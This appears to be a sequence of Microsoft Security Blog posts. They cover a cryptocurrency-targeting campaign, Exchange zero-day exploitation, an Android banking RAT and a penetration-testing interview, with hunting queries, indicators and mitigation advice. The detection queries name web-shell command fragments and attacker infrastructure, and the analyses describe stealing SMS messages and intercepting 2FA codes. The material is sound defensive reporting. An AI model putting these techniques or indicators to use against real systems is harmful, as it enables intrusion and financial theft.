In this report we analyzed a targeted attack on cryptocurrency investment fund startups. Such companies are relatively new, but manage hundreds of millions of dollars, raising interest by threat actors.   

In this attack we identified that the threat actor has broad knowledge of the cryptocurrency industry as well as the challenges their targets may face, increasing the sophistication of the attack and their chance of success. The threat actor used Telegram, an app widely used in the field, to identify the profile of interest, gained the target’s trust by discussing relevant topics, and finally sent a weaponized document that delivered a backdoor through multiple mechanisms. Additionally, the second attack identified was luring a fake crypto dashboard application.

The cryptocurrency market remains a field of interest for threat actors. Targeted users are identified through trusted channels to increase the chance of success. While the biggest companies can be targeted, smaller companies can also be targets of interest. The techniques used by the actor covered in this blog can be mitigated by adopting the security considerations provided below:

• Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
• Educate end users about protecting personal and business information in social media, filtering unsolicited communication (in this case, Telegram chat groups), identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.
• Educate end users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent via instant messaging applications or social networks. Encourage end users to practice good credential hygiene and make sure the Microsoft Defender Firewall (which is enabled by default) is always on to prevent malware infection and stifle propagation.
• Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.
• Turn on attack surface reduction rules to prevent common attack techniques observed in this threat:
  • Block Office applications from creating executable content
  • Block Office communication application from creating child processes
  • Block Win32 API calls from Office macros
• Ensure that Microsoft Defender Antivirus is up to date and that real-time behavior monitoring is enabled.

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

• TrojanDownloader:O97M/Wolfic.A
• TrojanDownloader:O97M/Wolfic.B
• TrojanDownloader:O97M/Wolfic.C
• TrojanDownloader:Win32/Wolfic.D
• TrojanDownloader:Win32/Wolfic.E
• Behavior:Win32/WolficDownloader.A
• Behavior:Win32/WolficDownloader.B

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network:

• An executable loaded an unexpected dll
• DLL search order hijack
• ‘Wolfic’ malware was prevented

Advanced hunting queries

The following hunting queries locate relevant activity.

Query that looks for Office apps that create a file within one of the known bad directories:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook" "powerpnt")
| where ActionType == "FileCreated"
| where parse_path( FolderPath ).DirectoryPath has_any(
    @"C:\ProgramData\Microsoft Media",
    @"C:\ProgramData\SoftwareCache",
    @"Roaming\Dashboard_v2"
    )
| project Timestamp, DeviceName, FolderPath, InitiatingProcessFileName, SHA256, InitiatingProcessAccountName, InitiatingProcessAccountDomain

Query that looks for Office apps that create a file within an uncommon directory (less that five occurrences), makes a set of each machine this is seen on, and each user that has executed it to help look for how many users/hosts are compromised:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook", "powerpnt")
| where ActionType == "FileCreated"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize PathCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, Path, InitiatingProcessFileName, SHA256
| where PathCount < 5

Query that summarizes child process of Office apps, looking for less than five occurrences:

DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| summarize ProcessCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, FolderPath, SHA256, InitiatingProcessFileName
| where ProcessCount < 5

Query that lists of all executables with Microsoft as ProcessVersionInfoCompanyName, groups them together by path, then looks for uncommon paths, with less than five occurrences:

DeviceProcessEvents
| where ProcessVersionInfoCompanyName has "Microsoft"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize ProcessList=make_set(FileName) by Path
| where array_length( ProcessList ) < 5

Query that searches for connections to malicious domains and IP addresses:

DeviceNetworkEvents
| where (RemoteUrl has_any ("strainservice.com")) 
     or (RemoteIP has_any ("198.54.115.248"))

Query that searches for files downloaded from malicious domains and IP addresses.

DeviceFileEvents
| where (FileOriginUrl  has_any ("strainservice.com")) 
     or (FileOriginIP  has_any ("198.54.115.248"))

Query that searchers for Office apps downloading files from uncommon domains, groups users, filenames, and devices together:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| summarize DomainCount=count(), UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName),
    FileList=make_set(FileName) by FileOriginUrl, FileOriginIP, InitiatingProcessFileName

Looks for downloaded files with uncommon file extensions, groups remote IPs, URLs, filenames, users, and devices:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt", "outlook")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| extend Extension=tostring(parse_path(FolderPath).Extension)
| extend  Path=tostring(parse_path(FolderPath).DirectoryPath)
| summarize ExtensionCount=count(), IpList=make_set(FileOriginIP), UrlList=make_set(FileOriginUrl), FileList=make_set(FileName),
    UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName) by Extension, InitiatingProcessFileName

Looks for Office apps that have child processes that match the GUID command line, with a check for Microsoft binaries to reduce the results before the regex:

DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ProcessVersionInfoCompanyName has "Microsoft"
| where ProcessCommandLine matches regex 
    @"[A-Za-z0-9]+\.exe [A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12} /[A-Za-z0-9]$"

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytic to automatically match the malicious IP and domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here:  https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy

To supplement this indicator matching customers can use the Advanced Hunting queries listed above against Microsoft 365 Defender data ingested into their workspaces as well as the following Microsoft Sentinel queries:

• Least common parent and child process pairs: https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows%20Security%20Events/Hunting%20Queries/Least_Common_Parent_Child_Process.yaml

• Detect anomalous process trees: https://github.com/Azure/Azure-Sentinel/blob/46906229919827bffa14211341f52dd68e27ad81/Hunting%20Queries/Microsoft%20365%20Defender/Execution/detect-anomalous-process-trees.yaml

Indicators of compromise

MITRE ATT&CK techniques

The post DEV-0139 launches targeted attacks against the cryptocurrency industry appeared first on Microsoft Security Blog.

We provided a seamless, comprehensive, and rapid response to the simulated attack using expert-led threat hunting and an industry-leading extended detection and response (XDR) platform—Microsoft 365 Defender. This evaluation showcased our service’s strength in the following areas:

• In-depth visibility and analytics across all stages of the attack chain.
• Comprehensive managed hunting.
• Seamless alert prioritization and consolidation into notifications for the security operations center (SOC).
• Tailored hunting guidance and advanced hunting queries (AHQ) to optimize investigations.
• Frequently updated and customized recommendations for rapid containment and remediation.
• Threat actor attribution with tactics, techniques, and procedures (TTP) context.
• Technology powered by a team of expert hunters and customer-centric approach.
• Commitment to managed extended detection and response (MXDR) partners running on Microsoft 365 Defender.

In-depth visibility and analytics across all stages of the attack chain

Figure 1. Microsoft Defender Experts for Hunting coverage. Fully reported—including initial access, execution, persistence, credential access, lateral movement, and collection—reflects 100 percent acceptance of evidence submission. Majority reported—including defense evasion, discovery, exfiltration, and command and control—reflects some gaps in evidence acceptance.

Comprehensive managed hunting

Microsoft Defender Experts for Hunting team identified all threats and provided a cohesive attack timeline with remediation guidance.

From the early stages of the intrusion, our hunters alerted the customer that a malicious archive masquerading as marketing materials was potentially part of a targeted attack. After a user opened the archive, a threat actor, which we attributed with high confidence as EUROPIUM, gained access to the environment.

Over the next few days, the threat actor used this foothold to steal credentials, move laterally in the network, deploy a web shell on an Exchange Server, and escalate privileges in the domain. The threat actor ultimately used their access to target sensitive data on an SQL server. Based on available telemetry, we reported that the threat actor staged sensitive data and may have successfully exfiltrated the data through email using a malicious RDAT utility.

Microsoft threat hunters discovered and investigated all of the essential and impactful TTPs used in this evaluation.

Seamless alert prioritization and consolidation into notifications for the SOC

From initial malware execution to data theft, Microsoft 365 Defender seamlessly detected and correlated alerts from all stages of the attack chain into two overarching incidents that provided end-to-end attack stories (see Figure 2). Microsoft 365 Defender’s incident correlation technology helps SOC analysts to counter alert fatigue, and our hunters then enrich these incidents by finding new attacks with the existing deep signals and custom alerting.

Figure 2. Consolidated incidents enriched by Defender Experts for Hunting as illustrated in the above tags.

Our hunters followed up on automated alerting with Defender Expert notifications (DENs) to provide additional context on the threat activity with an executive summary, threat actor attribution, detailed scope of impact, recommendations, and advanced hunting queries to self-serve investigations and response actions. This human enrichment helps the customer prioritize their time and focused actions in the SOC.

Figure 3. Beginning of incident executive summary provided by Defender Experts.

Tailored hunting guidance and AHQ to optimize investigations

Within the DENs, our hunters additionally provided tailored hunting guidance and AHQs to enable investigators to hunt for and identify relevant attack activity in each incident. Figure 4 shows one example where we directly flagged to the customer that a series of file modification events were consistent with data exfiltration attempts.

Figure 4. Example of running provided AHQs to surface activity of interest.

Frequently updated and customized recommendations for containment and remediation

Throughout the attack, our hunters regularly shared remediation guidance to aid the customer in a rapid response (Figure 5). As the incident developed, using the Recommendation Summary, we kept the customer apprised of the scope of the attack and the efforts needed to contain it.

Figure 5. Excerpt of custom recommendations in the Microsoft 365 Defender portal.

Threat actor attribution with TTP context

Microsoft Defender Experts for Hunting provided the customer with nation-state attribution based on observed TTPs and behaviors. We identified the activity was consistent with the threat actor EUROPIUM, also known as APT34 and OilRig, which Microsoft has observed as far back as 2015. EUROPIUM is a well-resourced actor capable of multiple types of attacks—from spear phishing and social engineering to remote exploitation of internet-facing devices.

We leveraged this attribution to provide valuable incident context, such as potential intrusion goals and relevant TTP, to the customer.

Figure 6. Incident attribution in Microsoft 365 Defender portal.

Technology powered by a team of expert hunters

The Microsoft philosophy in this evaluation was to represent product truth and real-world service delivery for our customers. We participated in the evaluation using our Defender Experts for Hunting team and product capabilities and configurations that we expect customers to use. As you review evaluation results, you should consider additional aspects including depth and durability of protection, completeness of signals, actionable insights, and the quality of what our hunters provided to enrich both the incidents and component alerts. All of these factors are critical in delivering a world-class hunting service to protect real customer production environments.

Commitment to MXDR partners running on Microsoft 365 Defender

Microsoft supported several of our verified MXDR partners in this evaluation. Our collaborative efforts reinforce our commitment to our MSSP partners’ success in building managed extended detection and response services to meet growing demand and support our joint customers.

We thank MITRE Engenuity for the opportunity to contribute to and participate in this year’s evaluation.

Read more about the MITRE Managed Services Evaluations.

Learn more

Learn more about Microsoft Defender Experts for Hunting.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

© November 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

The post Microsoft Defender Experts for Hunting demonstrates industry-leading protection in the 2022 MITRE Engenuity ATT&CK® Evaluations for Managed Services appeared first on Microsoft Security Blog.

Brooke: How did you get into cybersecurity?

Matthew: If your dad is a car mechanic, you grow up learning about cars. During the 1980s, my dad was super into computers. He used to go to my grandma’s school and bring home the computers prior to anyone really understanding what they were. These were the filing cabinet days and the days of carbon paper. Only very academic people and fringe technologists were interested in cybersecurity. When I was in high school, I had networks in my house with networked games. I started picking apart how the phone network worked and how internet access worked. My dad was supportive. He said, “If a 13-year-old kid can break into it, maybe we should not be using it.”

I pushed hard to get myself in front of as many people as I could and ended up working for a group from the National Computing Center. They had begun selling cybersecurity assurance services and penetration testing. I built a portfolio of my work publishing papers and showing people how computer systems were broken and how you could hack into them. At the time, you could not go to college and do cybersecurity. I dealt with a lot of rejection letters and a lot of people saying no and then I got my first job—that was 20 years ago. Now, I run my own company and I have written a book on the subject.

Brooke: What is most fascinating to you about cybersecurity?

Matthew: For me, it is the exciting element of offensive security testing. I take a low-privileged user on the system and say, “I want to make this user become a high-privileged user without authorization” and I will poke and probe my way through the system, testing all the boundaries and controls in place until I find ways to break it.

I began on an interesting journey; looking at things like state machines, where a computer will go through a lifecycle of a connection. When you connect your system to a server in the office, the computer will keep track of different states. For example, “Did you enter the right password?” and “Should it give you access?” I find these kinds of problems intellectually challenging and quite enjoyable.

Brooke: How do you help clients define and set goals for security control?

Matthew: There is a saying that this industry is run on fear, uncertainty, and doubt. I often ask clients: “If a hacker broke in tomorrow and had free rein of all your systems, what are you most concerned about?” We identify all the assets in the environment and their sensitive data and then review controls based on their concerns. Usually, they are most concerned about payment information and commercially sensitive information, or they are storing things that they perhaps should not have been storing, including credit card data and anything that could cause brand reputational damage.

It’s important to get board buy-in and foster a culture of cybersecurity in the organization and make it something that everybody in the company talks about regularly, like with phishing awareness.

Another key thing is to never punish the user. If they are at work and opening emails, that is what you are asking that person to do. Even the best cybersecurity professionals will click on a phishing link eventually. It’s human nature. These psychological lures are designed to get people to click on them. One of the most effective is a fake FedEx or UPS notification. Nine times out of 10, people will click on the link to track that parcel because they want to know. The attackers know our psychology and our natural human behaviors and how to get attacks through our radar in a way that does not alert us that we are being attacked. Proper cybersecurity in an organization takes human error into account.

Brooke: How do you reduce assessment times and identify threats faster?

Matthew: The MITRE ATT&CK^® Framework has been massively advantageous. It is a spreadsheet-based approach to understanding how an attacker behaves in an environment and it stems back to a paper written by Lockheed Martin. Lockheed Martin and the defense sector obviously were big targets for advanced persistent threats and cyber-enabled economic espionage, where nation-state actors break into their systems to steal information for espionage purposes.

Lockheed Martin came up with what they call the cyber kill chain, a timeline of an attack that starts at the very point that the attacker starts their breach into the network to the end—where they have exfiltrated and stolen the information. They modeled this and identified that the earlier you stop the attacker along this kill chain, the better, because they must start over again. The further along the chain they are, stopping the attack will cost the attacker more resources in terms of time and exploits used.

MITRE then came up with tools, techniques, and procedures. You can look at the threats in your industry and the known behaviors of threats targeting your sectors and begin unit testing those individual items. Instead of running a six-month engagement where we break into the client’s environment and do all this stealthy stuff, like monitor your network, we test against the actual threats and against these component items. That narrows the time involved in assessment activities and they get the result quicker.

Brooke: At what stage do clients bring your organization into the process?

Matthew: We work with a whole range of different clients, including people who have already built their product and people who have started to build their product. These kinds of strategies are usually very effective against large organizations—multinational corporations and Fortune 500 companies.

If you want to be effective in cybersecurity, the costs need to be on the attackers. We encourage organizations to move away from this longstanding engagement model and instead focus on doing unit tests against the actual situations they face. We call them cyber preparedness drills. We mimic the attacker’s behavior utilizing tools we’ve built, like these items we have published on GitHub for User Account Control (UAC) bypass testing:

• MsSettingsDelegateExecute
• Envschtasksuacbypass
• ColorDataProxyUACBypass
• iscsicpl_bypassUAC

These types of common attacker behaviors should be well-detected and even better detected by Microsoft Defender than they were previously. Simply scripting, even if it’s in the PowerShell command shell or the .NET developer platform and creating standard individual tests for specific items in the ATT&CK^® framework and running those as simulations gives you better results.

Brooke: What advice would you give to cybersecurity leaders on how to manage their budgets?

Matthew: There is a big push in the industry to do what is most interesting. Clients will say, “I want you to simulate a real attacker. I want the best hackers to throw everything you have at the system.” They want to spend a ton of money simulating a real attacker and I usually discover they have not covered any of the basics, like telemetry, alerting, or network defense.

It is easy to bring people on board, but if you have not looked at your environment and the basics, there is no point hiring a team to mimic your attacker and do a full six-month red team engagement. Your attacker is going to break into your network for free anyway, so you might as well focus on how you can use that budget to build better defenses to alert your team. So many companies do not know how many systems or databases they have, for instance. They do not have an accurate picture of what is happening in their environment. They look to the penetration testers who end up telling them more than they know about their network. 

Leaders should always ask: Do you have an accurate picture of the patch levels in your environment? If someone opens malware, can you see the events? Do you get the telemetry?

You could buy the best security system around and if it is getting 150 alerts a day but nobody is paying attention, it is useless because no one is going to ever act. When looking at your budget and how to spend it effectively, focus on granular engagement. When you hire a firm, hire one that has a good background and good understanding that can make effective use of that budget.

There are three approaches. There is a black box assessment methodology, where we know nothing about the environment, the target, or the target network. Then, you have a gray box methodology, where a client might share a little bit of information, such as what is given to a new starting staff member in an area where there is a high employee turnover rate. And third, there is a white box assessment, where they give us anything we want to know and we can see what they see. From our experience, you get the best results from white box assessments and from doing bite-sized exercises as your security provider is better informed and not reliant on guesswork achieved through the other two common methodologies.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Identifying cyberthreats quickly with proactive security testing appeared first on Microsoft Security Blog.

November 8, 2022 update – Microsoft has released patches for these issues. While Microsoft has not seen any further exploitation of these vulnerabilities in the wild since the targeted use in August, it is highly recommended that organizations patch their systems as attackers often reverse engineer patches to develop exploits.

October 1, 2022 update – Added information about Exploit:Script/ExchgProxyRequest.A, Microsoft Defender AV’s robust detection for exploit behavior related to this threat. We also removed a section on MFA as a mitigation, which was included in a prior version of this blog as standard guidance.

Microsoft is aware of limited targeted attacks using two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker. Refer to the Microsoft Security Response Center blog for mitigation guidance regarding these vulnerabilities.  

CVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. However, authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately.

Microsoft released patches for these issues on November 8, 2022. Customers who haven’t patched yet are urged to do so as soon as possible. Mitigation guidance is still provided here for organizations that have not yet deployed a mitigation, and can be used while deploying patches. Customers are encouraged to enable the Exchange Emergency Mitigation Service, which allows mitigations to be deployed automatically for future incidents.  

Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malware and activity associated with these attacks. Microsoft will continue to monitor threats that take advantage of these vulnerabilities and take necessary response actions to protect customers.

Analysis of observed activity

Attacks using Exchange vulnerabilities prior to public disclosure

MSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.

Microsoft researchers were investigating these attacks to determine if there was a new exploitation vector in Exchange involved when the Zero Day Initiative (ZDI) disclosed CVE-2022-41040 and CVE-2022-41082 to Microsoft Security Response Center (MSRC) in September 2022.

Observed activity after public disclosure

On September 28, 2022, GTSC released a blog disclosing an exploit previously reported to Microsoft via the Zero Day Initiative and detailing its use in an attack in the wild. Their blog details one example of chained exploitation of CVE-2022-41040 and CVE-2022-41082 and discusses the exploitation details of CVE-2022-41040. It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available.

While these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user. Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy. Prior Exchange vulnerabilities that require authentication have been adopted into the toolkits of attackers who deploy ransomware, and these vulnerabilities are likely to be included in similar attacks due to the highly privileged access Exchange systems confer onto an attacker.

Mitigation

Customers should refer to Microsoft Security Response Center’s post for the latest on mitigations for the Exchange product.

Microsoft Exchange Server customers using Microsoft 365 Defender are advised to follow this checklist:

• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
• Turn on tamper protection features to prevent attackers from stopping security services.
• Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
• Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
• Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
• Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.

Detection

Microsoft Defender Antivirus

Microsoft Exchange AMSI integration and Antivirus Exclusions

Exchange supports the integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It is highly recommended to ensure these updates are installed and AMSI is working using the guidance provided by the Exchange Team, as this integration provides the best ability for Defender Antivirus to detect and block exploitation of vulnerabilities on Exchange.  

Many organizations exclude Exchange directories from antivirus scans for performance reasons. It’s highly recommended to audit AV exclusions on Exchange systems and assess if they can be removed without impacting performance and still ensure the highest level of protection. Exclusions can be managed via Group Policy, PowerShell, or systems management tools like System Center Configuration Manager.

To audit AV exclusions on an Exchange Server running Defender Antivirus, launch the Get-MpPreference command from an elevated PowerShell prompt.

If exclusions cannot be removed for Exchange processes and folders, running Quick Scan in Defender Antivirus scans Exchange directories and files regardless of exclusions.

Microsoft Defender Antivirus detects the post-exploitation malware currently used in-the-wild exploitation of this vulnerability as the following:

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint detects post-exploitation activity. The following alerts could be related to this threat:

As of this writing, Defender for Endpoint customers with Microsoft Defender Antivirus enabled can also detect the web shell malware used in in-the-wild exploitation of this vulnerability with the following alerts:

Microsoft Defender Threat Intelligence

Microsoft Defender Threat Intelligence (MDTI) maps the internet to expose threat actors and their infrastructure. As indicators of compromise (IOCs) associated with threat actors targeting the vulnerabilities described in this writeup are surfaced, Microsoft Defender Threat Intelligence Community members and customers can find summary and enrichment information for all IOCs within the Microsoft Defender Threat Intelligence portal.

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management identifies devices in an associated tenant environment that might be affected by CVE-2022-41040 and CVE-2022-41082. These vulnerabilities have been added to the CISA known exploited vulnerabilities list and are considered in the overall organizational exposure score. Customers can use the following capabilities to identify vulnerable devices and assess exposure:

• Use the dedicated dashboard for each of CVE-2022-41040 and CVE-2022-41082 to get a consolidated view of various findings across vulnerable devices and software.
• Use the DeviceTvmSoftwareVulnerabilities table in advanced hunting to identify vulnerabilities in installed software on devices. Refer to the following query to run:

DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2022-41040", "CVE-2022-41082")

NOTE: The assessments above do not currently account for the existence of a workaround mitigation on the device. Microsoft will continue to improve these capabilities based on the latest information from the threat landscape.

Advanced hunting

Microsoft Sentinel

Based on what we’re seeing in the wild, Microsoft Sentinel customers can use the following techniques for web shell-related attacks connected to these vulnerabilities. Our post on web shell threat hunting with Microsoft Sentinel also provides guidance on looking for web shells in general. 

The Exchange SSRF Autodiscover ProxyShell detection, which was created in response to ProxyShell, can be used for queries due to functional similarities with this threat. Also, the new Exchange Server Suspicious File Downloads and Exchange Worker Process Making Remote Call queries specifically look for suspicious downloads or activity in IIS logs. In addition to these, we have a few more that could be helpful in looking for post-exploitation activity:

• Exchange OAB virtual directory attribute containing potential web shell 
• Web shell activity 
• Malicious web application requests linked with Microsoft Defender for Endpoint alerts 
• Exchange IIS worker dropping web shell 
• Web shell detection 

Microsoft 365 Defender

To locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:

Chopper web shell

Use this query to hunt for Chopper web shell activity:

DeviceProcessEvents
| where InitiatingProcessFileName =~ "w3wp.exe"
| where ProcessCommandLine has_any ("&ipconfig&echo", "&quser&echo", "&whoami&echo", "&c:&echo", "&cd&echo", "&dir&echo", "&echo [E]", "&echo [S]")

Suspicious files in Exchange directories

Use this query to hunt for suspicious files in Exchange directories:

DeviceFileEvents
| where Timestamp >= ago(7d)
| where InitiatingProcessFileName == "w3wp.exe"
| where FolderPath has "FrontEnd\\HttpProxy\\"
| where InitiatingProcessCommandLine contains "MSExchange"
| project FileName,FolderPath,SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp

External attack surface management

Microsoft Defender External Attack Surface Management

Microsoft Defender External Attack Surface Management continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. Attack Surface Insights are generated by leveraging vulnerability and infrastructure data to showcase the key areas of concern for your organization.

A High Severity Observation has been published to surface assets within an attack surface which should be examined for application of the mitigation steps described above. This insight, titled CVE-2022-41082 & CVE-2022-41040 – Microsoft Exchange Server Authenticated SSRF and PowerShell RCE, can be found under the high severity observations section of the Attack Surface Summary dashboard.

The post Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082 appeared first on Microsoft Security Blog.

Our investigation of this new Android malware version started from our receipt of an SMS message containing a malicious link that led us to the download of a fake banking rewards app. The fake app, detected as TrojanSpy:AndroidOS/Banker.O, used a different bank name and logo compared to a similar malware reported in 2021. Moreover, we found that this fake app’s command and control (C2) server is related to 75 other malicious APKs based on open-source intelligence. Some of the malicious APKs also use the same Indian bank’s logo as the fake app that we investigated, which could indicate that the actors are continuously generating new versions to keep the campaign going.

This blog details our analysis of the recent version’s capabilities. We strongly advise users never to click on unknown links received in SMS messages, emails, or messaging apps. We also recommend seeking your bank’s support or advice on digital options for your bank. Further, ensure that your banking apps are downloaded from official app stores to avoid installing malware.

Observed activity

What the user sees

We have seen other campaigns targeting Indian banks’ customers based on the following app names:

• Axisbank_rewards.apk
• Icici_points.apk
• Icici_rewards.apk
• SBI_rewards.apk

Our investigation focused on icici_rewards.apk (package name: com.example.test_app), which presents itself as ICICI Rewards. The SMS campaign sends out messages containing a malicious link that leads to installing a malicious APK on a target’s mobile device. To lure users into accessing the link, the SMS claims that the user is being notified to claim a reward from a known Indian bank.

Upon user interaction, it displays a splash screen with the bank logo and proceeds to ask the user to enable specific permissions for the app.

The fake app asks for credit card information upon being granted all permissions. This should raise users’ suspicions on the app’s motive as apps typically ask for sensitive information only through user-driven transactions like paying for purchases.

The app displays another fake screen with further instructions to add to its legitimacy once users supply the information needed.

What happens in the background

Analyzing the XML file AndroidManifest further identifies the entry points of the malware along with the permissions requested. It also defines services that can run in the background without user interaction. The app uses the following permissions:

• READ_PHONE_STATE
• ACCESS_NETWORK_STATE
• READ_SMS
• RECEIVE_SMS
• READ_CALL_LOG
• FOREGROUND_SERVICE
• MODIFY_AUDIO_SETTINGS
• READ_CONTACTS
• RECEIVE_BOOT_COMPLETED
• WAKE_LOCK

The malware uses MainActivity, AutoStartService, and RestartBroadCastReceiverAndroid functions to carry out most of its routines. These three functions interact to ensure all the malware’s routines are up and running and allow the app to remain persistent on the mobile device.

MainActivity

MainActivity, also called the launcher activity, is defined under com.example.test_app.MainActivity. It is launched first after installation to display the fake app’s ICICI splash screen. This launcher activity then calls OnCreate() method to check the device’s internet connectivity and record the timestamp of the malware’s installation, and Permission_Activity to launch permission requests. Once the permissions are granted, Permission_Activity further calls AutoStartService and login_kotak.

The class login_kotak is responsible for stealing the user’s card information. It shows the fake credit card input page (Figure 5) and temporarily stores the information in the device while waiting for commands from the attacker.

AutoStartService

AutoStartService, themain handler of the malware, functions based on the commands it receives. The handler provides the malware with the following capabilities:

Enforcing its RAT commands

This malware’s new version adds several RAT capabilities that expands its information stealing. It enables the malware to add call log uploading, SMS message and calls interception, and card blocking checks.

These commands are described below.

The silent command, which the malware uses to keep the remote attacker’s SMS sending activities undetected, stands out from the list of commands. Many banking apps require two-factor authentication (2FA), often sent through SMS messages. This malware enabling an infected device’s silent mode allows attackers to catch 2FA messages undetected, further facilitating information theft.

Encryption and decryption of SMS messages

In addition to encrypting all data it sends to the attacker, the malware also encrypts the SMS commands it receives from the attacker. The malware decrypts the commands through its decryption and decoding modules. The malware uses a combination of Base64 encoding/decoding and AES encryption/decryption methods.

Stealing SMS messages

The malware steals all SMS messages from the mobile device’s inbox. It collects all received, sent, read, and even unread messages. Collecting all SMS messages might allow attackers to use the data to expand their stealing range, especially if any messages contain other sensitive information such as SMS-based 2FA for email accounts, one’s personal identification like the Aadhar card commonly used in India, or other financial-related information.

Uploading all call logs

The malware also uploads call logs stored on the mobile device. This data may be used for the attacker’s surveillance purposes.

Communicating with its C2

This malware uses the open-source library socket.io to communicate with its C2 server.

RestartBroadCastReceiver

The malware also uses the Android component RestartBroadcastReceiver, which functions based on the type of events received by the mobile device. This receiver launches a job scheduler named JobService, which eventually calls AutoStartService in the background. The receiver reacts when the device is restarted, if the device is connected to or disconnected from charging, when the device’s battery status changes, and changes in the device’s Wi-Fi state.  RestartBroadcastReceiver ensures that the main command handler AutoStartService is always up and running.

Mitigating the fake app’s unwanted extras

This malware’s continuing evolution highlights the need to protect mobile devices. Its wider SMS stealing capabilities might allow attackers to the stolen data to further steal from a user’s other banking apps. Its ability to intercept one-time passwords (OTPs) sent over SMS thwarts the protections provided by banks’ two-factor authentication mechanisms, which users and institutions rely on to keep their transactions safe. Its use of various banking and financial organizations’ logos could also attract more targets in the future.

App installation on Android is relatively easy due to the operating system’s open nature. However, this openness is often abused by attackers for their gain. Apart from exercising utmost care when clicking on links in messages and installing apps, we recommend that users follow these steps to protect their devices from fake apps and malware:

• Download and install applications only from official app stores.
• Android device users can keep the Unknown sources option disabled to stop app installation from unknown sources.
• Use mobile solutions such as Microsoft Defender for Endpoint on Android to detect malicious applications.

Appendix

Indicators of compromise

MITRE ATT&CK techniques

Shivang Desai, Abhishek Pustakala, and Harshita Tripathi
Microsoft 365 Defender Research Team

The post Rewards plus: Fake mobile banking rewards apps lure users to install info-stealing RAT on Android devices appeared first on Microsoft Security Blog.

